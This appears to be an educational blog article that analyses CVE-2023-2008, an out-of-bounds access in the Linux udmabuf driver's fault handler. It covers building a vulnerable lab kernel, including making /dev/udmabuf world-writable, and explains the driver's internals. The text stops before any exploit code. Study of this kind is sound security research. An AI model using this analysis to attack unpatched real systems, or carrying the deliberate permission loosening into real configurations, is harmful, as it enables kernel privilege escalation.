Introduction to practical Linux kernel exploitation
Although the Linux kernel runs on most modern computers, its internals are rarely documented at the level of individual function calls, macro expansions, and so on. This makes our lives more difficult when we try to understand how Linux subsystems are implemented. On the other hand, vulnerability analysis is one of the best approaches to understanding a specific kernel submodule and its interaction with the whole system, as it dives into the implementation and logic details. Thus, it is possible to merge the “high-level” Linux documentation with the vulnerability analysis approach to create a complete study context.
This way, we can do the following:
- Choose an exciting vulnerability;
- Understand the kernel submodule the vulnerability is in;
- Perform different tests to understand the relationship between the vulnerable code and the rest of the kernel;
- Write an exploit that allows us to take advantage of the vulnerable code.
This line of thinking was inspired by what Nicolas Fabretti did on Lexfo’s security blog, where he created a walkthrough for developing a Linux kernel exploit from a CVE description.
For our first article, we wanted a vulnerability type with straightforward exploitation (out-of-bounds access) in a common kernel subsystem (heap memory management). Thus, we chose CVE-2023-2008, a flaw in the udmabuf device driver’s page fault handler. Although a public exploit and its write-up already exist, our goal is to demonstrate how we can understand a kernel subsystem starting from a CVE description and the exploitation technique. Therefore, the udmabuf concepts described here are not new; we aim to extend this knowledge with a full-context approach and several practical examples.
In light of this information, we will describe the environment we will work in, then analyze the CVE description and the patch that corrected the bug. This will give us the kernel submodule we need to study and guide our practical approach.
Environment
Before we begin with the CVE, let’s see how we can set our environment:
- Download Ubuntu 18.04 iso: https://releases.ubuntu.com/18.04/
- Normal installation, without updating any packages
- On the first boot, upgrade all packages to the latest 18.04 Ubuntu version
- Download the 5.4.84 Linux kernel (a vulnerable Linux kernel version): https://cdn.kernel.org/pub/linux/kernel/v5.x/linux-5.4.84.tar.gz
- Install dependencies
- build-essential
- flex
- bison
- libssl-dev
- libelf-dev
- Compile the Linux kernel 5.4.84
- make olddefconfig
- modify the .config
- CONFIG_DEBUG_INFO=n
- CONFIG_DEBUG_INFO_BTF=n
- CONFIG_SYSTEM_TRUSTED_KEYS=””
- make -j $(nproc) bindeb-pkg
- Install the kernel with:
dpkg -i *.deb
- Modify the permissions of /dev/udmabuf. This needs to be done because, on this Ubuntu version, non-root users cannot access this driver (on recent versions, the kvm group can access it):
- sudo chmod 666 /dev/udmabuf
CVE overview
Now that we have our environment set up, we can move to the CVE analysis. The CVE-2023-2008 description is:
A flaw was found in the Linux kernel’s udmabuf device driver. The specific flaw exists within a fault handler. The issue results from the lack of proper validation of user-supplied data, which can result in a memory access past the end of an array. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the kernel.
The vulnerability patch can be found here.
First, we need to identify the main bug. The description “memory access past the end of an array” is exactly the definition of an out-of-bounds (OOB) bug. At this point, it’s uncertain which operations (read or write) are possible on the out-of-bounds memory. The flaw is triggered by “user-supplied data”, which means we can trigger the bug ourselves. In addition, the description confirms that it is possible to escalate privileges and execute arbitrary code in kernel mode. Finally, it tells us that the vulnerable code is in the udmabuf device driver.
Now, let’s take a look at the patch. Even though we still don’t know what a udmabuf or a vm_area is, we can infer some things.
Vulnerable code:
static vm_fault_t udmabuf_vm_fault(struct vm_fault *vmf)
{
        struct vm_area_struct *vma = vmf->vma;
        struct udmabuf *ubuf = vma->vm_private_data;

        vmf->page = ubuf->pages[vmf->pgoff];
        get_page(vmf->page);
        return 0;
}
Patched code:
static vm_fault_t udmabuf_vm_fault(struct vm_fault *vmf)
{
        struct vm_area_struct *vma = vmf->vma;
        struct udmabuf *ubuf = vma->vm_private_data;
        pgoff_t pgoff = vmf->pgoff;

        if (pgoff >= ubuf->pagecount)
                return VM_FAULT_SIGBUS;

        vmf->page = ubuf->pages[pgoff];
        get_page(vmf->page);
        return 0;
}
We already know that we are dealing with an access past the end of an array. We can infer that the member pgoff is the offset being accessed, and that pagecount is the total number of elements in the array. This explains the patched code: it rejects the access unless the offset is strictly less than the number of elements in the array, returning VM_FAULT_SIGBUS otherwise.
Now we need to situate ourselves in the kernel; in other words, we need context. This is the time for us to understand what udmabuf is. After that, we will understand how an OOB can be exploited. Then, we will return to this point and figure out how to exploit the bug.
Udmabuf driver
As stated here, udmabuf is an interface to use dma-bufs. But what is a dma-buf? The name DMA refers to Direct Memory Access, which is the capacity of a device to access the host memory (RAM) without involving the CPU. The advantage of such a mechanism is that the CPU doesn’t need to stop its processing to perform the memory accesses on behalf of devices. One big example of a device that uses DMA is the GPU, as it needs to constantly read and write large amounts of data to/from the memory. This leads us to the definition of dma-buf:
The dma-buf subsystem provides the framework for sharing buffers for hardware (DMA) access across multiple device drivers and subsystems, and for synchronizing asynchronous hardware access. As an example, it is used extensively by the DRM subsystem to exchange buffers between processes, contexts, library APIs within the same process, and also to exchange buffers with other subsystems such as V4L2.
Since dma-buf is a complex subsystem, we will focus on what is necessary to understand udmabuf.
By reading the definition, we can say that dma-buf is used to share memory buffers across different entities, such as DMA-capable devices, processes, etc.
The dma-buf architecture is based on exporters and importers. Exporters are the owners of the shared buffer and define what operations can be performed on this memory area. Once the exporter allocates the memory and defines the operations, it can share the memory with the importers. Udmabuf allows user-space processes to become exporters, enabling them to create shared buffers through anonymous files.
Anonymous files are defined like this:
An anonymous file behaves like a regular file, and so can be modified, truncated, memory-mapped, and so on. However, unlike a regular file, it lives in RAM and has a volatile backing storage. Once all references to the file are dropped, it is automatically released.
Thus, udmabuf allows the user-space application to create the shared memory, but it abstracts both what physical memory will be used and the available operations on this memory through the anonymous file. It makes sense since user-space applications don’t have the power to define such things.
Despite these definitions being hidden from the user-space owner, it can still define the memory size (by calling ftruncate() on the anonymous file), share the memory (by sharing the anonymous file descriptor), add constraints to the memory region (by adding seals to the anonymous file), and so on. Let’s take a look at how an anonymous file can be created, how to use it as the udmabuf shared memory, and how to manage it.
int mem_fd = memfd_create("test", MFD_ALLOW_SEALING);
if (mem_fd < 0)
    errx(1, "couldn't create anonymous file");
The memfd_create() syscall creates an anonymous file. It receives the name of the created file (which will appear in the /proc/self/fd/ directory) and flags that define the behavior of memfd_create. On success, the syscall returns the file descriptor that identifies the created file.
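As a quick sanity check (a small sketch of ours, not part of the original flow; it assumes the usual <stdio.h> and <unistd.h> includes), we can read the /proc/self/fd/ symlink to see the name we just passed:

char path[64], target[256];
snprintf(path, sizeof(path), "/proc/self/fd/%d", mem_fd);
ssize_t n = readlink(path, target, sizeof(target) - 1);
if (n > 0) {
    target[n] = '\0';
    printf("%s -> %s\n", path, target); /* e.g. "/memfd:test (deleted)" */
}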
The file is created empty. To set the size of the file (the size of the memory that backs it), we can use the ftruncate syscall like this:
if (ftruncate(mem_fd, 4096) < 0)
    errx(1, "couldn't truncate file length");
In this example, we set the file size to 4096 bytes.
We can also use seals (if we pass the MFD_ALLOW_SEALING flag to memfd_create()) to impose constraints on the file, like preventing it from growing or shrinking, preventing modification, and so on. To add a seal, we use the fcntl syscall, which manipulates file descriptors. Here is an example:
if (fcntl(mem_fd, F_ADD_SEALS, F_SEAL_SHRINK) < 0)
    errx(1, "couldn't seal file");
In this example, we passed the file descriptor that we will operate on, indicated that we want to add a seal to the file it points to (via the F_ADD_SEALS parameter), and specified the desired seal. Here, we added the F_SEAL_SHRINK seal, which prevents the file from shrinking. The available seals can be found in the fcntl manual.
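To check which seals are currently set, we can query them back with F_GET_SEALS (a small sketch of ours, reusing mem_fd from above):

int seals = fcntl(mem_fd, F_GET_SEALS);
if (seals < 0)
    errx(1, "couldn't read seals");
if (seals & F_SEAL_SHRINK)
    printf("the file can no longer shrink\n");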
At this point, we have the anonymous file with the desired constraints. We can now create a udmabuf using our file. By “a udmabuf”, we mean a dma-buf created through the udmabuf driver. The interface that the kernel provides to user-space processes to create udmabufs is the /dev/udmabuf file and some ioctl commands.
The first thing we have to do is to open this file:
int dev_fd = open("/dev/udmabuf", O_RDWR);
if (dev_fd < 0)
    errx(1, "couldn't open device");
After this, we will use the returned file descriptor to issue commands via the ioctl syscall. ioctl is a generic syscall commonly used by device drivers to expose new interfaces to user space without creating new syscalls. It receives a file descriptor (used to identify the driver that will handle the command), the command, and the parameters. Each driver creates new commands with arbitrary parameters. Since a command number needs to be unique across the system, some macros are used to create them (_IO, _IOW, _IOR, _IOWR). The operations provided by a given driver are usually available in its header files.
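Conceptually, these macros pack the transfer direction, the argument size, a driver “magic” character, and a command number into a single 32-bit value. The sketch below is ours and only illustrates the encoding; the shift values match asm-generic/ioctl.h on x86, and the real macros should always be used instead:

/* illustrative only -- the real macros live in <asm-generic/ioctl.h> */
#define MY_IOC(dir, type, nr, size) \
    (((dir) << 30) | ((size) << 16) | ((type) << 8) | (nr))
#define MY_IOW(type, nr, argtype) \
    MY_IOC(1U /* _IOC_WRITE */, (type), (nr), sizeof(argtype))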
To create a udmabuf, we will perform the following ioctl command:
struct udmabuf_create
{
    uint32_t memfd;
    uint32_t flags;
    uint64_t offset;
    uint64_t size;
};

#define UDMABUF_CREATE _IOW('u', 0x42, struct udmabuf_create)

struct udmabuf_create create = { 0 };
create.memfd = mem_fd;
create.size = 4096;

int udmabuf_fd = ioctl(dev_fd, UDMABUF_CREATE, &create);
if (udmabuf_fd < 0)
    errx(1, "couldn't create udmabuf");
Before issuing the actual command, we need to prepare its parameters. The udmabuf driver expects a struct udmabuf_create referencing the file descriptor of the anonymous file (memfd) that will back the shared memory, along with its size. After this, we can issue the ioctl, passing the /dev/udmabuf file descriptor, the creation command, and the parameter. This returns the udmabuf’s file descriptor, which can be shared with the importers.
Once an importer gets the udmabuf file descriptor, it can map it into its memory through the mmap syscall; in other words, it can set a range of its address space to be the shared memory.
In the next section, we will dive into the kernel side of the udmabuf driver; that is, we will see how all the previous operations are handled by the kernel.
Kernel-side view of udmabufs
First of all, udmabuf is a kernel module: put simply, a piece of code that is loaded into the kernel and executes in privileged context. A Linux kernel module needs to provide two basic functions, init and exit, executed when the module is loaded and unloaded, respectively. The udmabuf driver implements them as follows:
static const struct file_operations udmabuf_fops = {
        .owner = THIS_MODULE,
        .unlocked_ioctl = udmabuf_ioctl,
};

static struct miscdevice udmabuf_misc = {
        .minor = MISC_DYNAMIC_MINOR,
        .name = "udmabuf",
        .fops = &udmabuf_fops,
};

static int __init udmabuf_dev_init(void)
{
        return misc_register(&udmabuf_misc);
}

static void __exit udmabuf_dev_exit(void)
{
        misc_deregister(&udmabuf_misc);
}

module_init(udmabuf_dev_init)
module_exit(udmabuf_dev_exit)
The udmabuf init function, udmabuf_dev_init, calls misc_register, an auxiliary function that creates a generic device file inside the /dev directory. Its parameter is a struct miscdevice that mainly defines the file name and a set of operations that can be executed on the device file. The operations are defined in the struct file_operations udmabuf_fops; this set of operations implements the ioctl ones. The handler is registered as unlocked_ioctl because of the kernel’s ioctl reformulation, which no longer imposes the old global locking mechanism. .unlocked_ioctl = udmabuf_ioctl refers to the function:
static long udmabuf_ioctl(struct file *filp, unsigned int ioctl,
                          unsigned long arg)
{
        long ret;

        switch (ioctl) {
        case UDMABUF_CREATE:
                ret = udmabuf_ioctl_create(filp, arg);
                break;
        case UDMABUF_CREATE_LIST:
                ret = udmabuf_ioctl_create_list(filp, arg);
                break;
        default:
                ret = -ENOTTY;
                break;
        }
        return ret;
}
This is the ioctl core functionality, which defines all operations and how they are handled. Each switch entry in this function refers to an operation passed as the second parameter of the ioctl syscall. That parameter is evaluated to call the desired operation.
Let’s first analyze UDMABUF_CREATE, and then UDMABUF_CREATE_LIST, another command that also creates udmabufs.
UDMABUF_CREATE operation calls udmabuf_ioctl_create:
static long udmabuf_ioctl_create(struct file *filp, unsigned long arg)
{
        struct udmabuf_create create;
        struct udmabuf_create_list head;
        struct udmabuf_create_item list;

        if (copy_from_user(&create, (void __user *)arg, sizeof(create)))
                return -EFAULT;

        head.flags = create.flags;
        head.count = 1;
        list.memfd = create.memfd;
        list.offset = create.offset;
        list.size = create.size;

        return udmabuf_create(&head, &list);
}
This function is a wrapper around udmabuf_create. Before calling the underlying function, it creates a list of size one.
UDMABUF_CREATE_LIST calls udmabuf_ioctl_create_list:
static const u32 list_limit = 1024;

static long udmabuf_ioctl_create_list(struct file *filp, unsigned long arg)
{
        struct udmabuf_create_list head;
        struct udmabuf_create_item *list;
        int ret = -EINVAL;
        u32 lsize;

        if (copy_from_user(&head, (void __user *)arg, sizeof(head)))
                return -EFAULT;
        if (head.count > list_limit)
                return -EINVAL;
        lsize = sizeof(struct udmabuf_create_item) * head.count;
        list = memdup_user((void __user *)(arg + sizeof(head)), lsize);
        if (IS_ERR(list))
                return PTR_ERR(list);

        ret = udmabuf_create(&head, list);
        kfree(list);
        return ret;
}
Again, just another wrapper. copy_from_user and memdup_user copy a memory segment from user space; the latter calls copy_from_user but also allocates the memory used as the destination. They are used to copy the syscall parameters into the kernel.
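For reference, memdup_user is small enough to quote; it looks roughly like this in this kernel series (from mm/util.c):

void *memdup_user(const void __user *src, size_t len)
{
        void *p;

        p = kmalloc_track_caller(len, GFP_USER | __GFP_NOWARN);
        if (!p)
                return ERR_PTR(-ENOMEM);

        if (copy_from_user(p, src, len)) {
                kfree(p);
                return ERR_PTR(-EFAULT);
        }

        return p;
}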
The list used in both cases is an array with additional info. The struct udmabuf_create_list is the head of the list and contains the size __u32 count, some flags __u32 flags, and the list items struct udmabuf_create_item list[].
Each item holds a file descriptor __u32 memfd, an offset __u64 offset, and a size __u64 size.
At this point, we still don’t know what operations the driver will perform on the list, because it hasn’t been used yet. But we can see that the items describe the anonymous files the exporter created.
Checking the list head and item structs:
struct udmabuf_create_item {
        __u32 memfd;
        __u32 __pad;
        __u64 offset;
        __u64 size;
};

struct udmabuf_create_list {
        __u32 flags;
        __u32 count;
        struct udmabuf_create_item list[];
};
Now we can enter the udmabuf_create function knowing that it expects a list, and in some cases, the list will contain only one element.
This function is somewhat long, so we split it into two parts to make it easier to understand.
static const size_t size_limit_mb = 64;

static long udmabuf_create(const struct udmabuf_create_list *head,
                           const struct udmabuf_create_item *list)
{
        DEFINE_DMA_BUF_EXPORT_INFO(exp_info);
        struct file *memfd = NULL;
        struct udmabuf *ubuf;
        struct dma_buf *buf;
        pgoff_t pgoff, pgcnt, pgidx, pgbuf = 0, pglimit;
        struct page *page;
        int seals, ret = -EINVAL;
        u32 i, flags;

        ubuf = kzalloc(sizeof(*ubuf), GFP_KERNEL);
        if (!ubuf)
                return -ENOMEM;

        pglimit = (size_limit_mb * 1024 * 1024) >> PAGE_SHIFT;
        for (i = 0; i < head->count; i++) {
                if (!IS_ALIGNED(list[i].offset, PAGE_SIZE))
                        goto err;
                if (!IS_ALIGNED(list[i].size, PAGE_SIZE))
                        goto err;
                ubuf->pagecount += list[i].size >> PAGE_SHIFT;
                if (ubuf->pagecount > pglimit)
                        goto err;
        }
        ubuf->pages = kmalloc_array(ubuf->pagecount, sizeof(*ubuf->pages),
                                    GFP_KERNEL);
        if (!ubuf->pages) {
                ret = -ENOMEM;
                goto err;
        }

        ... SNIP ...

err:
        while (pgbuf > 0)
                put_page(ubuf->pages[--pgbuf]);
        if (memfd)
                fput(memfd);
        kfree(ubuf->pages);
        kfree(ubuf);
        return ret;
}
This is the allocation part. kmalloc is a kernel heap allocation function. The code starts by allocating struct udmabuf *ubuf via ubuf = kzalloc(sizeof(*ubuf), GFP_KERNEL); kzalloc is a wrapper around kmalloc that zero-initializes the allocated memory.
static inline void *kzalloc(size_t size, gfp_t flags)
{
        return kmalloc(size, flags | __GFP_ZERO);
}
Then, the driver verifies some size constraints and allocates the ubuf->pages page array. A struct page describes a physical memory frame. It makes sense for the udmabuf driver to deal with physical memory, since the memory can be shared with different processes and even with DMA-capable devices.
Finally, ubuf->pages = kmalloc_array(ubuf->pagecount, sizeof(*ubuf->pages), GFP_KERNEL) is called. kmalloc_array is another wrapper around kmalloc, intended for array allocations. What needs to be highlighted is that the total size in bytes is n * size, and this multiplication is performed with overflow protection.
static inline void *kmalloc_array(size_t n, size_t size, gfp_t flags)
{
        size_t bytes;

        if (unlikely(check_mul_overflow(n, size, &bytes)))
                return NULL;
        if (__builtin_constant_p(n) && __builtin_constant_p(size))
                return kmalloc(bytes, flags);
        return __kmalloc(bytes, flags);
}
After all the preparation above, we can move to the last part. Some code is purposely repeated, as we find it easier to visualize.
static long udmabuf_create(const struct udmabuf_create_list *head,
                           const struct udmabuf_create_item *list)
{
        DEFINE_DMA_BUF_EXPORT_INFO(exp_info);
        struct file *memfd = NULL;
        struct udmabuf *ubuf;
        struct dma_buf *buf;
        pgoff_t pgoff, pgcnt, pgidx, pgbuf = 0, pglimit;
        struct page *page;
        int seals, ret = -EINVAL;
        u32 i, flags;

        ... SNIP ...

        pgbuf = 0;
        for (i = 0; i < head->count; i++) {
                ret = -EBADFD;
                memfd = fget(list[i].memfd);
                if (!memfd)
                        goto err;
                if (!shmem_mapping(file_inode(memfd)->i_mapping))
                        goto err;
                seals = memfd_fcntl(memfd, F_GET_SEALS, 0);
                if (seals == -EINVAL)
                        goto err;
                ret = -EINVAL;
                if ((seals & SEALS_WANTED) != SEALS_WANTED ||
                    (seals & SEALS_DENIED) != 0)
                        goto err;
                pgoff = list[i].offset >> PAGE_SHIFT;
                pgcnt = list[i].size >> PAGE_SHIFT;
                for (pgidx = 0; pgidx < pgcnt; pgidx++) {
                        page = shmem_read_mapping_page(
                                file_inode(memfd)->i_mapping, pgoff + pgidx);
                        if (IS_ERR(page)) {
                                ret = PTR_ERR(page);
                                goto err;
                        }
                        ubuf->pages[pgbuf++] = page;
                }
                fput(memfd);
                memfd = NULL;
        }

        exp_info.ops = &udmabuf_ops;
        exp_info.size = ubuf->pagecount << PAGE_SHIFT;
        exp_info.priv = ubuf;
        exp_info.flags = O_RDWR;

        buf = dma_buf_export(&exp_info);
        if (IS_ERR(buf)) {
                ret = PTR_ERR(buf);
                goto err;
        }

        flags = 0;
        if (head->flags & UDMABUF_FLAGS_CLOEXEC)
                flags |= O_CLOEXEC;
        return dma_buf_fd(buf, flags);

err:
        while (pgbuf > 0)
                put_page(ubuf->pages[--pgbuf]);
        if (memfd)
                fput(memfd);
        kfree(ubuf->pages);
        kfree(ubuf);
        return ret;
}
The first for loop is where the magic starts to unfold. First, memfd = fget(list[i].memfd) retrieves the struct file associated with the anonymous file descriptor created by the user (the exporter). The struct file is how the kernel keeps track of opened files, so each file descriptor in user space has an associated struct file in the kernel. Then the driver performs the check if (!shmem_mapping(file_inode(memfd)->i_mapping)) goto err;.
Going deeper to understand what this means:
struct file {
        ... SNIP ...
        struct inode *f_inode;
        ... SNIP ...
} __randomize_layout __attribute__((aligned(4)));

static inline struct inode *file_inode(const struct file *f)
{
        return f->f_inode;
}

struct inode {
        ... SNIP ...
        struct address_space *i_mapping;
        ... SNIP ...
} __randomize_layout;

struct address_space {
        ... SNIP ...
        const struct address_space_operations *a_ops;
        ... SNIP ...
} __attribute__((aligned(sizeof(long)))) __randomize_layout;

bool shmem_mapping(struct address_space *mapping)
{
        return mapping->a_ops == &shmem_aops;
}
First, file_inode(memfd) gets the struct inode associated with that struct file. inode is the struct responsible for describing files, directories, pipes, sockets, or any other entity that can be abstracted as a file. For the sake of comparison, there can be several struct files for a single struct inode since it’s possible to open a file multiple times.
Then, the inode’s struct address_space is passed to the function. There are a number of distinct yet related services that an address-space can provide, always related to the memory that can hold file content mappings. For an anonymous file, this structure is related to the memory that actually holds the data.
Finally, shmem_mapping simply checks whether the struct address_space_operations of that inode’s struct address_space is shmem_aops, the operations table for shared memory (shmem). In other words, the driver checks that the memory created by the exporter is shared memory, which makes sense since we are creating a udmabuf.
Continuing with the memfd validation, the driver verifies that the correct seals are in place.
Now the operations based on the list start to execute. For each page of each item, a page is read with page = shmem_read_mapping_page(file_inode(memfd)->i_mapping, pgoff + pgidx) and added to the struct page * array created earlier: ubuf->pages[pgbuf++] = page. It is extremely important to understand that ubuf->pages holds the same physical page references as the exporter’s memfd, which means that the udmabuf shares the memfd’s pages created by the exporter.
All these operations run in a for loop because the exporter can pass a list of memfds to the driver (through the UDMABUF_CREATE_LIST command), and all of their pages must be collected. Finally, assuming everything worked as expected, we move to the last part.
The driver will associate the udmabuf_ops, pagecount, udmabuf struct, and flags with the struct dma_buf *buf in buf = dma_buf_export(&exp_info) and then return dma_buf_fd(buf, flags).
It is important to notice that we are entering the dma_buf scope. Referencing again to the dma-buf documentation:
The exporter defines his exporter instance using DEFINE_DMA_BUF_EXPORT_INFO() and calls dma_buf_export() to wrap a private buffer object into a dma_buf. It then exports that dma_buf to userspace as a file descriptor by calling dma_buf_fd().
Moving to the next step:
Userspace passes this file-descriptors to all drivers it wants this buffer to share with: First, the file descriptor is converted to a dma_buf using dma_buf_get(). Then the buffer is attached to the device using dma_buf_attach().
Now, the exporter only needs to start sharing the file descriptor with the importers. This leads us to the next chapter: the importer.
Importers of a udmabuf
As said earlier, both udmabuf creation commands return a udmabuf file descriptor that can be shared with importers. One easy way to share the file descriptor is to create another process with the fork syscall from the exporter. As the documentation states:
The child inherits copies of the parent’s set of open file descriptors.
Another alternative is passing the file descriptor over Unix domain sockets.
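For completeness, here is a minimal sketch of ours of the classic SCM_RIGHTS dance for sending a file descriptor to an unrelated process over a Unix domain socket (the function name send_fd is ours):

#include <string.h>
#include <sys/socket.h>
#include <sys/uio.h>

/* sends fd as ancillary data; the receiver gets its own duplicate of it */
static int send_fd(int sock, int fd)
{
    char dummy = 'x';
    struct iovec iov = { .iov_base = &dummy, .iov_len = 1 };
    union { struct cmsghdr hdr; char buf[CMSG_SPACE(sizeof(int))]; } u;
    struct msghdr msg = { .msg_iov = &iov, .msg_iovlen = 1,
                          .msg_control = u.buf, .msg_controllen = sizeof(u.buf) };

    struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);
    cmsg->cmsg_level = SOL_SOCKET;
    cmsg->cmsg_type = SCM_RIGHTS;
    cmsg->cmsg_len = CMSG_LEN(sizeof(int));
    memcpy(CMSG_DATA(cmsg), &fd, sizeof(int));

    return sendmsg(sock, &msg, 0) < 0 ? -1 : 0;
}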
When the importer gets the file descriptor, it can map the udmabuf physical pages on its virtual memory space and access it normally. Here we will exemplify how a regular process performs the importer operation.
void *udmabuf_map = mmap(NULL, 4096, PROT_READ | PROT_WRITE,
                         MAP_SHARED, udmabuf_fd, 0);
if (udmabuf_map == MAP_FAILED)
    errx(1, "couldn't map udmabuf");
It’s that simple! The mmap syscall receives the udmabuf file descriptor (udmabuf_fd), the size (4096), the access rights (PROT_READ | PROT_WRITE), and a flag requesting shared memory (MAP_SHARED). The syscall returns the pointer the process will use to access the memory.
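A quick way to convince ourselves that the mapping and the anonymous file share the same pages is a sketch like this (ours, reusing mem_fd and udmabuf_map from the snippets above, and assuming <string.h>, <stdio.h>, and <unistd.h> are included):

/* write through the dma-buf mapping... */
strcpy(udmabuf_map, "hello");

/* ...and read it back through the memfd that backs it */
char check[6] = { 0 };
if (pread(mem_fd, check, 5, 0) == 5)
    printf("read back through memfd: %s\n", check); /* prints "hello" */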
Memory mapping is a mechanism that abstracts a lot of complexity to provide simple access to a resource. When an object is memory mapped, a specific range of memory will be used as an access interface to the object. Depending on the type of the object that is being mapped, the kernel has to treat the memory accesses on that memory range differently. In our context, the udmabuf driver is the kernel subsystem responsible for implementing the required mechanisms that allow the shared buffers to be mapped. As an example, other objects also can be memory mapped such as device registers, regular files, device memory, and so on.
The mmap syscall creates a mapping inside the calling process’s virtual address space. For example, if we map a regular file into a process address space, modifications to that memory region actually modify the file. In our case, modifications to the mapped area modify the content of the shared buffer. mmap has several parameter combinations that make it a powerful function, so feel free to read the manual!
Now, we will see how the mmap magic is done inside the kernel, and how the udmabuf driver registers its memory mapping operations.
On the udmabuf_create analysis we saw that the allowed operations in the udmabufs are stored in a struct dma_buf_ops that is pointed by a struct dma_buf. The udmabuf driver defines these operations in the variable called udmabuf_ops, which is a struct dma_buf_ops. The mmap operation is included in this structure.
struct dma_buf {
        ... SNIP ...
        const struct dma_buf_ops *ops;
        ... SNIP ...
};

struct dma_buf_ops {
        ... SNIP ...
        int (*mmap)(struct dma_buf *, struct vm_area_struct *vma);
        ... SNIP ...
};

static const struct dma_buf_ops udmabuf_ops = {
        ... SNIP ...
        .mmap = mmap_udmabuf,
};
Looking into the mmap_udmabuf:
static int mmap_udmabuf(struct dma_buf *buf, struct vm_area_struct *vma)
{
        struct udmabuf *ubuf = buf->priv;

        if ((vma->vm_flags & (VM_SHARED | VM_MAYSHARE)) == 0)
                return -EINVAL;

        vma->vm_ops = &udmabuf_vm_ops;
        vma->vm_private_data = ubuf;
        return 0;
}
Here we are introduced to a new structure: struct vm_area_struct. A vm_area holds information about a contiguous virtual memory area; for each mmap, there is a struct vm_area_struct describing the mapped memory range. The vm_ops member points to a struct vm_operations_struct holding the operations for that range. Analyzing the previous code, we can see that when a udmabuf is mapped, mmap_udmabuf is called and the udmabuf driver sets the operations of the mapped area to the udmabuf_vm_ops variable. Let’s take a look at this variable:
static const struct vm_operations_struct udmabuf_vm_ops = {
        .fault = udmabuf_vm_fault,
};
As we can see, the driver only implements the fault operation, which is the function executed when a page fault occurs in the range.
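For reference, the struct vm_area_struct fields used here look roughly like this (abridged by us; the full definition lives in include/linux/mm_types.h):

struct vm_area_struct {
        unsigned long vm_start;  /* first address of the mapping */
        unsigned long vm_end;    /* first address past the mapping */
        ... SNIP ...
        const struct vm_operations_struct *vm_ops; /* udmabuf_vm_ops here */
        void *vm_private_data;                     /* the struct udmabuf here */
        ... SNIP ...
};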
The page fault handler is one of the most important functions related to memory mapping. When an access to a mapped region generates a page fault, the kernel needs to identify the type of the mapped object and call its specific function to resolve the fault. One situation that always generates a page fault is the first access to a mapped area: when a mapping is created, the kernel records that the memory is mapped, but it doesn’t immediately fetch the physical content that backs the range. On the first access, the hardware raises a page fault exception and the kernel executes the page fault handler to make the page table point to the corresponding physical pages.
The handler executed when a page fault is raised is a generic function that walks all the page table levels; the one thing it cannot determine by itself is the physical page frame number. To obtain the physical page that will back the faulty virtual address, the kernel executes the function provided by the subsystem managing the mapped object. In our case, this function is udmabuf_vm_fault. That’s interesting! We have reached the buggy function we saw at the beginning. We will continue our study with the unpatched version of the code.
static vm_fault_t udmabuf_vm_fault(struct vm_fault *vmf)
{
        struct vm_area_struct *vma = vmf->vma;
        struct udmabuf *ubuf = vma->vm_private_data;

        vmf->page = ubuf->pages[vmf->pgoff];
        get_page(vmf->page);
        return 0;
}
We can see that it receives a struct vm_fault as a parameter. This structure is created by the kernel to describe the fault currently being handled. The function sets the page member of this structure; this is exactly the point where the udmabuf driver informs the kernel which physical page corresponds to the faulty virtual address, taking the page from the ubuf->pages array we already analyzed. The kernel can then insert the physical page number into the page table, finishing the fault handling. Before returning, the udmabuf driver calls get_page, which just increments the reference counter of the page in question, as shown below:
static inline void get_page(struct page *page)
{
        ... SNIP ...
        page_ref_inc(page);
}
Reference counters are widely used by the kernel to control when a resource can be freed. If the reference counter is not zero, some entity is still using the resource and it can’t be freed.
This whole fault path is triggered when the importer accesses the mapping:
udmabuf_map[i];
Now that we have the context about the buggy driver, we need to learn the exploit technique that allows us to take advantage of it. In other words, it’s time for us to understand OOBs.
Out-of-Bounds (OOB) vulnerabilities
Looking at the CWE definition for OOB Read we get:
The product reads data past the end, or before the beginning, of the intended buffer.
The definition is almost the same for the OOB Write, just changing the access mode for write.
As an example, we have written two simple user-space programs to demonstrate OOB accesses: the first uses variables on the stack, the second on the heap. The main difference is that the stack case is more straightforward, since when the first array ends, the second starts right after it. When we perform the same OOB on the heap, we need to deal with its peculiarities, as the heap allocator stores metadata around our buffers and aligns them. Refer to Azeria’s blog for a deep explanation of glibc heap management.
Keep in mind that all examples were executed on the Ubuntu 18.04 / kernel 5.4.84 setup described earlier. Different distributions or different Ubuntu versions may ship different glibc versions, and thus produce different results.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

int main(void)
{
    char ptr[10];
    char ptr2[20];

    memset(ptr, 'j', 10);
    memset(ptr2, 'a', 20);

    printf("diff: %lld\n", (unsigned long long)ptr2 - (unsigned long long)ptr);
    // diff: 10

    printf("ptr: %s\n", ptr);
    // ptr: jjjjjjjjjjaaaaaaaaaaaaaaaaaaaa�

    return 0;
}
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

int main(void)
{
    char *ptr = malloc(10);
    char *ptr2 = malloc(20);

    unsigned long long diff = (unsigned long long)ptr2 - (unsigned long long)ptr;
    printf("diff: %lld\n", diff);
    // diff: 32

    memset(ptr, 'j', 10);
    memset(ptr2, 'a', 20);

    printf("ptr: %s\n", ptr);
    // ptr: jjjjjjjjjj

    memset(ptr + diff, 'y', 20);
    printf("ptr2: %s\n", ptr2);
    // ptr2: yyyyyyyyyyyyyyyyyyyy

    return 0;
}
In the first example, which allocates both arrays on the stack, we accessed the data of the second buffer through the first pointer. This happens because the end of the ptr string is right before the start of the ptr2 string, and printf with %s prints byte by byte until it reaches a byte with value 0.
In the latter example, the same doesn’t work because of the heap manager’s behavior: ptr and ptr2 aren’t contiguous, as shown by the “diff” print. When the first printf is called, it stops before ptr2 because it finds a zero byte in between. This doesn’t prevent the OOB itself: when memset is called on ptr + diff, which is the beginning of ptr2, we successfully write into ptr2’s data through ptr.
After this introduction, we can understand that, in the end, the problem lies in the code that controls the accesses. If bounds are checked improperly, we end up in the same situation as in the examples above, usually in a somewhat more complicated form.
Let’s look again at the vulnerable code:
static vm_fault_t udmabuf_vm_fault(struct vm_fault *vmf)
{
        struct vm_area_struct *vma = vmf->vma;
        struct udmabuf *ubuf = vma->vm_private_data;

        vmf->page = ubuf->pages[vmf->pgoff];
        get_page(vmf->page);
        return 0;
}
The variable we need to control is vmf->pgoff, because the access to ubuf->pages is not bounds-checked. This variable is set by the kernel in the fault handler: it is the page-granular offset of the faulty address within the virtual memory area, i.e., BYTE_OFFSET / 4096. For example, faulting at byte offset 40960 into the mapping yields pgoff = 10.
